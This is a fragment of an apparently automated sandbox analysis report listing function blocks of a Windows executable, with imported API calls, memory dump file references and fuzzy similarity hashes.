          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Rect$BeepClientMessageScreenWindow
          • String ID:
          • API String ID: 1352109105-0
          • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
          • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
          • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
          • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
          APIs
          • CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0045D248
          • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
          • CreateHardLinkW.KERNEL32(00000000,?,00000000), ref: 0045D2AA
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CreateHardLink$DeleteErrorFileLast
          • String ID:
          • API String ID: 3321077145-0
          • Opcode ID: c049f476996f26e48387e21af26546bd3ade17eeb336bdbfeb7e800aea879025
          • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
          • Opcode Fuzzy Hash: c049f476996f26e48387e21af26546bd3ade17eeb336bdbfeb7e800aea879025
          • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
          APIs
          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
          • __isleadbyte_l.LIBCMT ref: 004208A6
          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
          • String ID:
          • API String ID: 3058430110-0
          • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
          • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
          • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
          • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
          APIs
          • GetParent.USER32(?), ref: 004503C8
          • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
          • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
          • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Proc$Parent
          • String ID:
          • API String ID: 2351499541-0
          • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
          • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
          • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
          • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
          APIs
            • Part of subcall function 004367CF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004367E1
            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00461F92
          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00461FC1
          • __itow.LIBCMT ref: 00461FD2
          • __itow.LIBCMT ref: 00462016
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$__itow$_memmove_wcslen
          • String ID:
          • API String ID: 3055246884-0
          • Opcode ID: 680069b6984fce1f78b4a73a7cc87c87b9b9bd06752f3eaec9f9348e36ef7987
          • Instruction ID: 2d6fee67be8c1f37eead957347fb4951583f5dfa804ed1177570fd3be5bc4abd
          • Opcode Fuzzy Hash: 680069b6984fce1f78b4a73a7cc87c87b9b9bd06752f3eaec9f9348e36ef7987
          • Instruction Fuzzy Hash: 2F2127327003096BDB20EE69DD85EAF3768EB88714F00456BFD14AB241D679DC4587A9
          APIs
          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
          • TranslateMessage.USER32(?), ref: 00442B01
          • DispatchMessageW.USER32(?), ref: 00442B0B
          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Message$Peek$DispatchTranslate
          • String ID:
          • API String ID: 1795658109-0
          • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
          • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
          • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
          • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
          APIs
          • GetForegroundWindow.USER32 ref: 0047439C
            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32(00000000), ref: 004439EB
            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
          • GetCaretPos.USER32(?), ref: 004743B2
          • ClientToScreen.USER32(00000000,?), ref: 004743E8
          • GetForegroundWindow.USER32 ref: 004743EE
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
          • String ID:
          • API String ID: 2759813231-0
          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
          APIs
            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
          • _wcslen.LIBCMT ref: 00449519
          • _wcslen.LIBCMT ref: 00449526
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend_wcslen$_wcspbrk
          • String ID:
          • API String ID: 2886238975-0
          • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
          • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
          • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
          • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __setmode$DebugOutputString_fprintf
          • String ID:
          • API String ID: 1792727568-0
          • Opcode ID: 82eaaed52695fbaf4d251d9c6fc514291b8525fa1fa6e6ee5924846bb5fa078f
          • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
          • Opcode Fuzzy Hash: 82eaaed52695fbaf4d251d9c6fc514291b8525fa1fa6e6ee5924846bb5fa078f
          • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
          APIs
            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
          • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
          • SetWindowLongW.USER32 ref: 0047A2FA
          • SetWindowLongW.USER32 ref: 0047A312
          • SetLayeredWindowAttributes.USER32 ref: 0047A321
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$Long$AttributesLayered
          • String ID:
          • API String ID: 2169480361-0
          • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
          • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
          • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
          • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
          APIs
            • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
            • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
            • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
          • lstrlenW.KERNEL32(?), ref: 00434CF6
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
          • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: lstrcmpilstrcpylstrlen$_malloc
          • String ID: cdecl
          • API String ID: 3850814276-3896280584
          • Opcode ID: d1d89b6772feb810e67725c10ec9afedeeab06d56abd113e71d1e2eedb43bc5d
          • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
          • Opcode Fuzzy Hash: d1d89b6772feb810e67725c10ec9afedeeab06d56abd113e71d1e2eedb43bc5d
          • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
          APIs
            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
          • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
          • _memmove.LIBCMT ref: 0046D475
          • inet_ntoa.WSOCK32(?), ref: 0046D481
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
          • String ID:
          • API String ID: 2502553879-0
          • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
          • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
          • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
          • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
          APIs
          • SendMessageW.USER32 ref: 00448C69
          • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$LongWindow
          • String ID:
          • API String ID: 312131281-0
          • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
          • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
          • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
          • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
          APIs
          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
          • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
          • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorLastacceptselect
          • String ID:
          • API String ID: 385091864-0
          • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
          • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
          • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
          • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
          APIs
          • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend
          • String ID:
          • API String ID: 3850602802-0
          • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
          • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
          • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
          • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
          APIs
          • CreateWindowExW.USER32 ref: 00430242
          • GetStockObject.GDI32(00000011), ref: 00430258
          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
          • ShowWindow.USER32(00000000,00000000), ref: 0043027D
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$CreateMessageObjectSendShowStock
          • String ID:
          • API String ID: 1358664141-0
          • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
          • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
          • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
          • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
          APIs
          • GetCurrentThreadId.KERNEL32 ref: 00443CA6
          • MessageBoxW.USER32 ref: 00443CDC
          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
          • CloseHandle.KERNEL32(00000000), ref: 00443CF9
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
